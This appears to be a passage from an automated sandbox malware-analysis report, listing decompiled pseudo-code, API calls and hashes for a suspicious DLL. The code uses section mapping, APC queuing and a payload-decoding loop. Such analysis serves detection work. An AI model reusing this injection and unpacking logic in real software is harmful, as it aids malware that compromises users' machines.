              0x6e1c1baf
              0x6e1c1bb0
              0x6e1c1bc1
              0x6e1c1bc5
              0x6e1c1bd9
              0x6e1c1bdc
              0x6e1c1bdf
              0x6e1c1be6
              0x6e1c1be9
              0x6e1c1bf0
              0x6e1c1bf3
              0x6e1c1bf6
              0x6e1c1bf9
              0x6e1c1bfe
              0x6e1c1c39
              0x6e1c1c00
              0x6e1c1c03
              0x6e1c1c09
              0x6e1c1c0e
              0x6e1c1c12
              0x6e1c1c30
              0x6e1c1c14
              0x6e1c1c1b
              0x6e1c1c29
              0x6e1c1c29
              0x6e1c1c12
              0x6e1c1c41

              APIs
              • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1C1BF9
                • Part of subcall function 6E1C1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1C1C0E,00000002,00000000,?,?,00000000,?,?,6E1C1C0E,00000000), ref: 6E1C1EF4
              • memset.NTDLL ref: 6E1C1C1B
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Section$CreateViewmemset
              • String ID: @
              • API String ID: 2533685722-2766056989
              • Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
              • Instruction ID: 067a5a76a8e38c74908698a99dda20eae672e85973d2ed78bdf25e3c1e7eb3c7
              • Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
              • Instruction Fuzzy Hash: DA213BB1E0020DAFCB01CFE9C8809DEFBB9EB18704F504829E505F3210D7349A489B65
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E6E1C1EC7(void** __esi, PVOID* _a4) {
              				long _v8;
              				void* _v12;
              				void* _v16;
              				long _t13;
              
              				_v16 = 0;
              				asm("stosd");
              				_v8 = 0;
              				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
              				if(_t13 < 0) {
              					_push(_t13);
              					return __esi[6]();
              				}
              				return 0;
              			}







              0x6e1c1ed9
              0x6e1c1edf
              0x6e1c1eed
              0x6e1c1ef4
              0x6e1c1ef9
              0x6e1c1eff
              0x00000000
              0x6e1c1f00
              0x00000000

              APIs
              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1C1C0E,00000002,00000000,?,?,00000000,?,?,6E1C1C0E,00000000), ref: 6E1C1EF4
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: SectionView
              • String ID:
              • API String ID: 1323581903-0
              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
              • Instruction ID: dabc91180f7c6157f8bcab1383139ececdf6d6b3fd02e34d867a97413a3254f7
              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
              • Instruction Fuzzy Hash: EBF082B690020CBFEB119FA5CC84C9FBBBDEB44354B104939F152E1090D2309E4C9A60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E6E1C1C7D(intOrPtr _a4) {
              				char _v28;
              				struct _SYSTEMTIME _v44;
              				char _v48;
              				long _v52;
              				long _v56;
              				void* __edi;
              				long _t21;
              				int _t23;
              				long _t26;
              				long _t27;
              				long _t31;
              				void* _t37;
              				intOrPtr _t39;
              				intOrPtr _t44;
              				signed int _t45;
              				void* _t50;
              				signed int _t54;
              				void* _t56;
              				intOrPtr* _t57;
              
              				_t21 = E6E1C1F10();
              				_v52 = _t21;
              				if(_t21 != 0) {
              					L18:
              					return _t21;
              				} else {
              					goto L1;
              				}
              				do {
              					L1:
              					GetSystemTime( &_v44);
              					_t23 = SwitchToThread();
              					asm("cdq");
              					_t45 = 9;
              					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
              					_t26 = E6E1C18AD(0, _t54); // executed
              					_v56 = _t26;
              					Sleep(_t54 << 5); // executed
              					_t21 = _v56;
              				} while (_t21 == 0xc);
              				if(_t21 != 0) {
              					goto L18;
              				}
              				_t27 = E6E1C1ADB(_t45); // executed
              				_v52 = _t27;
              				if(_t27 != 0) {
              					L16:
              					_t21 = _v52;
              					if(_t21 == 0xffffffff) {
              						_t21 = GetLastError();
              					}
              					goto L18;
              				}
              				if(_a4 != 0) {
              					L11:
              					_push(0);
              					_t56 = E6E1C13D1(E6E1C14E8,  &_v28);
              					if(_t56 == 0) {
              						_v56 = GetLastError();
              					} else {
              						_t31 = WaitForSingleObject(_t56, 0xffffffff);
              						_v56 = _t31;
              						if(_t31 == 0) {
              							GetExitCodeThread(_t56,  &_v56);
              						}
              						CloseHandle(_t56);
              					}
              					goto L16;
              				}
              				if(E6E1C134F(_t45,  &_v48) != 0) {
              					 *0x6e1c41b8 = 0;
              					goto L11;
              				}
              				_t44 = _v48;
              				_t57 = __imp__GetLongPathNameW;
              				_t37 =  *_t57(_t44, 0, 0); // executed
              				_t50 = _t37;
              				if(_t50 == 0) {
              					L9:
              					 *0x6e1c41b8 = _t44;
              					goto L11;
              				}
              				_t15 = _t50 + 2; // 0x2
              				_t39 = E6E1C1B58(_t50 + _t15);
              				 *0x6e1c41b8 = _t39;
              				if(_t39 == 0) {
              					goto L9;
              				} else {
              					 *_t57(_t44, _t39, _t50); // executed
              					E6E1C142F(_t44);
              					goto L11;
              				}
              			}






















              0x6e1c1c89
              0x6e1c1c92
              0x6e1c1c96
              0x6e1c1d9e
              0x6e1c1da4
              0x00000000
              0x00000000
              0x00000000
              0x6e1c1c9c
              0x6e1c1c9c
              0x6e1c1ca1
              0x6e1c1ca7
              0x6e1c1cb6
              0x6e1c1cb7
              0x6e1c1cba
              0x6e1c1cbd
              0x6e1c1cc6
              0x6e1c1cca
              0x6e1c1cd0
              0x6e1c1cd4
              0x6e1c1cdb
              0x00000000
              0x00000000
              0x6e1c1ce1
              0x6e1c1ce8
              0x6e1c1cec
              0x6e1c1d8f
              0x6e1c1d8f
              0x6e1c1d96
              0x6e1c1d98
              0x6e1c1d98
              0x00000000
              0x6e1c1d96
              0x6e1c1cf5
              0x6e1c1d48
              0x6e1c1d48
              0x6e1c1d59
              0x6e1c1d5d
              0x6e1c1d8b
              0x6e1c1d5f
              0x6e1c1d62
              0x6e1c1d6a
              0x6e1c1d6e
              0x6e1c1d76
              0x6e1c1d76
              0x6e1c1d7d
              0x6e1c1d7d
              0x00000000
              0x6e1c1d5d
              0x6e1c1d03
              0x6e1c1d42
              0x00000000
              0x6e1c1d42
              0x6e1c1d05
              0x6e1c1d09
              0x6e1c1d12
              0x6e1c1d14
              0x6e1c1d18
              0x6e1c1d3a
              0x6e1c1d3a
              0x00000000
              0x6e1c1d3a
              0x6e1c1d1a
              0x6e1c1d1f
              0x6e1c1d26
              0x6e1c1d2b
              0x00000000
              0x6e1c1d2d
              0x6e1c1d30
              0x6e1c1d33
              0x00000000
              0x6e1c1d33

              APIs
                • Part of subcall function 6E1C1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
                • Part of subcall function 6E1C1F10: GetVersion.KERNEL32 ref: 6E1C1F2E
                • Part of subcall function 6E1C1F10: GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
                • Part of subcall function 6E1C1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E1C1CA1
              • SwitchToThread.KERNEL32 ref: 6E1C1CA7
                • Part of subcall function 6E1C18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
                • Part of subcall function 6E1C18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • Sleep.KERNELBASE(00000000,00000000), ref: 6E1C1CCA
              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1C1D12
              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1C1D30
              • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1C14E8,?,00000000), ref: 6E1C1D62
              • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1C1D76
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1D7D
              • GetLastError.KERNEL32(6E1C14E8,?,00000000), ref: 6E1C1D85
              • GetLastError.KERNEL32 ref: 6E1C1D98
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
              • String ID:
              • API String ID: 1962885430-0
              • Opcode ID: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction ID: 05e1698dc7c22bdfe323542b900fa9b2a15442dbdee2dd94200ac244c9319a58
              • Opcode Fuzzy Hash: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction Fuzzy Hash: B531A7726847419BC750DFE5884C9AF7AFDAFA6F58B104916F894C2140EB3CC489A7A3
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E6E1C1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
              				intOrPtr _v12;
              				struct _FILETIME* _v16;
              				short _v60;
              				struct _FILETIME* _t14;
              				intOrPtr _t15;
              				long _t18;
              				void* _t19;
              				void* _t22;
              				intOrPtr _t31;
              				long _t32;
              				void* _t34;
              
              				_t31 = __edx;
              				_t14 =  &_v16;
              				GetSystemTimeAsFileTime(_t14);
              				_push(0x192);
              				_push(0x54d38000);
              				_push(_v12);
              				_push(_v16);
              				L6E1C2210();
              				_push(_t14);
              				_v16 = _t14;
              				_t15 =  *0x6e1c41d0;
              				_push(_t15 + 0x6e1c505e);
              				_push(_t15 + 0x6e1c5054);
              				_push(0x16);
              				_push( &_v60);
              				_v12 = _t31;
              				L6E1C220A();
              				_t18 = _a4;
              				if(_t18 == 0) {
              					_t18 = 0x1000;
              				}
              				_t19 = CreateFileMappingW(0xffffffff, 0x6e1c41c0, 4, 0, _t18,  &_v60); // executed
              				_t34 = _t19;
              				if(_t34 == 0) {
              					_t32 = GetLastError();
              				} else {
              					if(_a4 != 0 || GetLastError() == 0xb7) {
              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
              						if(_t22 == 0) {
              							_t32 = GetLastError();
              							if(_t32 != 0) {
              								goto L9;
              							}
              						} else {
              							 *_a8 = _t34;
              							 *_a12 = _t22;
              							_t32 = 0;
              						}
              					} else {
              						_t32 = 2;
              						L9:
              						CloseHandle(_t34);
              					}
              				}
              				return _t32;
              			}














              0x6e1c1144
              0x6e1c114d
              0x6e1c1151
              0x6e1c1157
              0x6e1c115c
              0x6e1c1161
              0x6e1c1164
              0x6e1c1167
              0x6e1c116c
              0x6e1c116d
              0x6e1c1170
              0x6e1c117b
              0x6e1c1182
              0x6e1c1186
              0x6e1c1188
              0x6e1c1189
              0x6e1c118c
              0x6e1c1191
              0x6e1c119b
              0x6e1c119d
              0x6e1c119d
              0x6e1c11b1
              0x6e1c11b7
              0x6e1c11bb
              0x6e1c120b
              0x6e1c11bd
              0x6e1c11c6
              0x6e1c11dc
              0x6e1c11e4
              0x6e1c11f6
              0x6e1c11fa
              0x00000000
              0x00000000
              0x6e1c11e6
              0x6e1c11e9
              0x6e1c11ee
              0x6e1c11f0
              0x6e1c11f0
              0x6e1c11d1
              0x6e1c11d3
              0x6e1c11fc
              0x6e1c11fd
              0x6e1c11fd
              0x6e1c11c6
              0x6e1c1213

              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?,?), ref: 6E1C1151
              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1C1167
              • _snwprintf.NTDLL ref: 6E1C118C
              • CreateFileMappingW.KERNELBASE(000000FF,6E1C41C0,00000004,00000000,?,?), ref: 6E1C11B1
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11C8
              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1C11DC
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11F4
              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A), ref: 6E1C11FD
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C1205
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
              • String ID:
              • API String ID: 1724014008-0
              • Opcode ID: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction ID: 803b6c2780bf403bb96ebac22d9f8b35b69169cd61ce97a2e769f5d4ec081a58
              • Opcode Fuzzy Hash: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction Fuzzy Hash: 0421D672640108BFDB01AFE8CC88EDE7BB9EB65B50F214165F915E7140D63C5C85EB62
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
              				intOrPtr _v8;
              				_Unknown_base(*)()* _t29;
              				_Unknown_base(*)()* _t33;
              				_Unknown_base(*)()* _t36;
              				_Unknown_base(*)()* _t39;
              				_Unknown_base(*)()* _t42;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t50;
              				intOrPtr _t56;
              
              				_t56 = E6E1C1B58(0x20);
              				if(_t56 == 0) {
              					_v8 = 8;
              				} else {
              					_t50 = GetModuleHandleA( *0x6e1c41d0 + 0x6e1c5014);
              					_v8 = 0x7f;
              					_t29 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50e1);
              					 *(_t56 + 0xc) = _t29;
              					if(_t29 == 0) {
              						L8:
              						E6E1C142F(_t56);
              					} else {
              						_t33 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50f1);
              						 *(_t56 + 0x10) = _t33;
              						if(_t33 == 0) {
              							goto L8;
              						} else {
              							_t36 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5104);
              							 *(_t56 + 0x14) = _t36;
              							if(_t36 == 0) {
              								goto L8;
              							} else {
              								_t39 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5119);
              								 *(_t56 + 0x18) = _t39;
              								if(_t39 == 0) {
              									goto L8;
              								} else {
              									_t42 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c512f);
              									 *(_t56 + 0x1c) = _t42;
              									if(_t42 == 0) {
              										goto L8;
              									} else {
              										 *((intOrPtr*)(_t56 + 8)) = _a8;
              										 *((intOrPtr*)(_t56 + 4)) = _a4;
              										_t46 = E6E1C1B9C(_t56, _a12); // executed
              										_v8 = _t46;
              										if(_t46 != 0) {
              											goto L8;
              										} else {
              											 *_a16 = _t56;
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              				return _v8;
              			}












              0x6e1c106e
              0x6e1c1072
              0x6e1c1133
              0x6e1c1078
              0x6e1c1090
              0x6e1c109f
              0x6e1c10a6
              0x6e1c10aa
              0x6e1c10ad
              0x6e1c112b
              0x6e1c112c
              0x6e1c10af
              0x6e1c10bc
              0x6e1c10c0
              0x6e1c10c3
              0x00000000
              0x6e1c10c5
              0x6e1c10d2
              0x6e1c10d6
              0x6e1c10d9
              0x00000000
              0x6e1c10db
              0x6e1c10e8
              0x6e1c10ec
              0x6e1c10ef
              0x00000000
              0x6e1c10f1
              0x6e1c10fe
              0x6e1c1102
              0x6e1c1105
              0x00000000
              0x6e1c1107
              0x6e1c110d
              0x6e1c1113
              0x6e1c1118
              0x6e1c111f
              0x6e1c1122
              0x00000000
              0x6e1c1124
              0x6e1c1127
              0x6e1c1127
              0x6e1c1122
              0x6e1c1105
              0x6e1c10ef
              0x6e1c10d9
              0x6e1c10c3
              0x6e1c10ad
              0x6e1c1141

              APIs
                • Part of subcall function 6E1C1B58: HeapAlloc.KERNEL32(00000000,?,6E1C1702,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B64
              • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1C1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1C1084
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10A6
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10BC
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10D2
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10E8
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10FE
                • Part of subcall function 6E1C1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1C1BF9
                • Part of subcall function 6E1C1B9C: memset.NTDLL ref: 6E1C1C1B
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
              • String ID:
              • API String ID: 1632424568-0
              • Opcode ID: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction ID: c55f6172b4d60dac4960483c3967355f82887751ae68e4afe54efec6a1ecb65d
              • Opcode Fuzzy Hash: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction Fuzzy Hash: B021A5F160060B9FDB40EFA9DC84D5A7BFCFB65E44B104415E989D7201E33CE906AB61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
              				long _v8;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				char _t9;
              				void* _t10;
              				void* _t18;
              				void* _t23;
              				void* _t36;
              
              				_push(__ecx);
              				_t9 = _a8;
              				_v8 = 1;
              				if(_t9 == 0) {
              					_t10 = InterlockedDecrement(0x6e1c4188);
              					__eflags = _t10;
              					if(_t10 == 0) {
              						__eflags =  *0x6e1c418c;
              						if( *0x6e1c418c != 0) {
              							_t36 = 0x2328;
              							while(1) {
              								SleepEx(0x64, 1);
              								__eflags =  *0x6e1c4198;
              								if( *0x6e1c4198 == 0) {
              									break;
              								}
              								_t36 = _t36 - 0x64;
              								__eflags = _t36;
              								if(_t36 > 0) {
              									continue;
              								}
              								break;
              							}
              							CloseHandle( *0x6e1c418c);
              						}
              						HeapDestroy( *0x6e1c4190);
              					}
              				} else {
              					if(_t9 == 1 && InterlockedIncrement(0x6e1c4188) == 1) {
              						_t18 = HeapCreate(0, 0x400000, 0); // executed
              						_t41 = _t18;
              						 *0x6e1c4190 = _t18;
              						if(_t18 == 0) {
              							L6:
              							_v8 = 0;
              						} else {
              							 *0x6e1c41b0 = _a4;
              							asm("lock xadd [eax], edi");
              							_push( &_a8);
              							_t23 = E6E1C13D1(E6E1C20CE, E6E1C121C(_a12, 1, 0x6e1c4198, _t41));
              							 *0x6e1c418c = _t23;
              							if(_t23 == 0) {
              								asm("lock xadd [esi], eax");
              								goto L6;
              							}
              						}
              					}
              				}
              				return _v8;
              			}












              0x6e1c1db1
              0x6e1c1dbd
              0x6e1c1dbf
              0x6e1c1dc2
              0x6e1c1e38
              0x6e1c1e3e
              0x6e1c1e40
              0x6e1c1e42
              0x6e1c1e48
              0x6e1c1e4a
              0x6e1c1e4f
              0x6e1c1e52
              0x6e1c1e5d
              0x6e1c1e5f
              0x00000000
              0x00000000
              0x6e1c1e61
              0x6e1c1e64
              0x6e1c1e66
              0x00000000
              0x00000000
              0x00000000
              0x6e1c1e66
              0x6e1c1e6e
              0x6e1c1e6e
              0x6e1c1e7a
              0x6e1c1e7a
              0x6e1c1dc4
              0x6e1c1dc5
              0x6e1c1de5
              0x6e1c1deb
              0x6e1c1ded
              0x6e1c1df2
              0x6e1c1e2e
              0x6e1c1e2e
              0x6e1c1df4
              0x6e1c1dfc
              0x6e1c1e03
              0x6e1c1e0d
              0x6e1c1e19
              0x6e1c1e20
              0x6e1c1e25
              0x6e1c1e2a
              0x00000000
              0x6e1c1e2a
              0x6e1c1e25
              0x6e1c1df2
              0x6e1c1dc5
              0x6e1c1e87

              APIs
              • InterlockedIncrement.KERNEL32(6E1C4188), ref: 6E1C1DD0
              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1C1DE5
                • Part of subcall function 6E1C13D1: CreateThread.KERNELBASE ref: 6E1C13E8
                • Part of subcall function 6E1C13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
                • Part of subcall function 6E1C13D1: GetLastError.KERNEL32(00000000), ref: 6E1C1408
                • Part of subcall function 6E1C13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
                • Part of subcall function 6E1C13D1: CloseHandle.KERNEL32(00000000), ref: 6E1C1419
                • Part of subcall function 6E1C13D1: SetLastError.KERNEL32(00000000), ref: 6E1C1422
              • InterlockedDecrement.KERNEL32(6E1C4188), ref: 6E1C1E38
              • SleepEx.KERNEL32(00000064,00000001), ref: 6E1C1E52
              • CloseHandle.KERNEL32 ref: 6E1C1E6E
              • HeapDestroy.KERNEL32 ref: 6E1C1E7A
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
              • String ID:
              • API String ID: 2110400756-0
              • Opcode ID: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction ID: 8f3352a58246418d07f1a9f43faede5fccf891133e5ec329b7854fec8119d5f0
              • Opcode Fuzzy Hash: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction Fuzzy Hash: 4821CF36744601AFEB019FE9C88CA4A3FB8F772E603218125E448D3140D23CA986FB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C13D1(long _a4, DWORD* _a12) {
              				_Unknown_base(*)()* _v0;
              				void* _t4;
              				long _t6;
              				long _t11;
              				void* _t13;
              
              				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1c41cc, 0, _a12); // executed
              				_t13 = _t4;
              				if(_t13 != 0) {
              					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
              					if(_t6 == 0) {
              						_t11 = GetLastError();
              						TerminateThread(_t13, _t11);
              						CloseHandle(_t13);
              						_t13 = 0;
              						SetLastError(_t11);
              					}
              				}
              				return _t13;
              			}








              0x6e1c13e8
              0x6e1c13ee
              0x6e1c13f2
              0x6e1c13fd
              0x6e1c1405
              0x6e1c140e
              0x6e1c1412
              0x6e1c1419
              0x6e1c1420
              0x6e1c1422
              0x6e1c1428
              0x6e1c1405
              0x6e1c142c

              APIs
              • CreateThread.KERNELBASE ref: 6E1C13E8
              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
              • GetLastError.KERNEL32(00000000), ref: 6E1C1408
              • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1419
              • SetLastError.KERNEL32(00000000), ref: 6E1C1422
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
              • String ID:
              • API String ID: 3832013932-0
              • Opcode ID: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction ID: 1e0629bde33280a18db333d60db0f8d39a5fb3288d0537c365b588c66174f1de
              • Opcode Fuzzy Hash: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction Fuzzy Hash: 1EF01C37205B21BBDB125BA08C0CF9FBF69FB1AF51F00C444F609D1150C72A8866BBA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E6E1C18AD(void* __edi, intOrPtr _a4) {
              				intOrPtr _v8;
              				char _v12;
              				void* _v16;
              				unsigned int _v20;
              				intOrPtr _v24;
              				char _v28;
              				signed int _v32;
              				void* _v36;
              				signed int _v40;
              				signed char _v44;
              				void* _v48;
              				signed int _v56;
              				signed int _v60;
              				intOrPtr _t50;
              				void* _t57;
              				void* _t61;
              				signed int _t67;
              				signed char _t69;
              				signed char _t70;
              				void* _t76;
              				intOrPtr _t77;
              				unsigned int _t82;
              				intOrPtr _t86;
              				intOrPtr* _t89;
              				intOrPtr _t90;
              				void* _t91;
              				signed int _t93;
              
              				_t90 =  *0x6e1c41b0;
              				_t50 = E6E1C1000(_t90,  &_v28,  &_v20);
              				_v24 = _t50;
              				if(_t50 == 0) {
              					asm("sbb ebx, ebx");
              					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
              					_t91 = _t90 + _v28;
              					_v48 = _t91;
              					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
              					_t76 = _t57;
              					_v36 = _t76;
              					if(_t76 == 0) {
              						_v24 = 8;
              					} else {
              						_t69 = 0;
              						if(_t67 <= 0) {
              							_t77 =  *0x6e1c41cc;
              						} else {
              							_t86 = _a4;
              							_v8 = _t91;
              							_v8 = _v8 - _t76;
              							_t14 = _t86 + 0x6e1c5137; // 0x3220a9c2
              							_t61 = _t57 - _t91 + _t14;
              							_v16 = _t76;
              							do {
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t70 = _t69 + 1;
              								_v44 = _t70;
              								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
              								if(_t82 != 0) {
              									_v32 = _v32 & 0x00000000;
              									_t89 = _v16;
              									_v12 = 0x400;
              									do {
              										_t93 =  *((intOrPtr*)(_v8 + _t89));
              										_v40 = _t93;
              										if(_t93 == 0) {
              											_v12 = 1;
              										} else {
              											 *_t89 = _t93 + _v32 - _t82;
              											_v32 = _v40;
              											_t89 = _t89 + 4;
              										}
              										_t33 =  &_v12;
              										 *_t33 = _v12 - 1;
              									} while ( *_t33 != 0);
              								}
              								_t69 = _v44;
              								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
